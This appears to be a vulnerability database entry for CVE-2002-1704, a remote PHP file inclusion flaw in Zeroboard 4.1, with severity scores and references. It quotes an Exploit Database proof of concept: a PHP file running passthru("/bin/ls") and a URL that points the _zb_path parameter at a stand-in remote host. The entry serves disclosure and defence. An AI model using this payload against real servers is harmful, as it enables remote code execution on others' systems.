CVE-2002-1704 : Detail

CVE-2002-1704

1.68%V3
Network
2005-06-21
02h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Zeroboard 4.1, when the "allow_url_fopen" and "register_globals" variables are enabled, allows remote attackers to execute arbitrary PHP code by modifying the _zb_path parameter to reference a URL on a remote web server that contains the code.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21557

Publication date : 2002-06-14
22h00 +00:00
Author : onlooker
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5028/info Zeroboard is a PHP web board package available for the Linux and Unix platforms. Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script. PHP Source file a.php <? passthru("/bin/ls"); ?> Accessing URL on vulnerable system: http://vulnerablesystem/_head.php?_zb_path=http://example.com/a

Products Mentioned

Configuraton 0

Zeroboard>>Zeroboard >> Version 4.1_pl2

    References

    http://www.securityfocus.com/bid/5028
    Tags : vdb-entry, x_refsource_BID
    http://online.securityfocus.com/archive/1/277126
    Tags : mailing-list, x_refsource_BUGTRAQ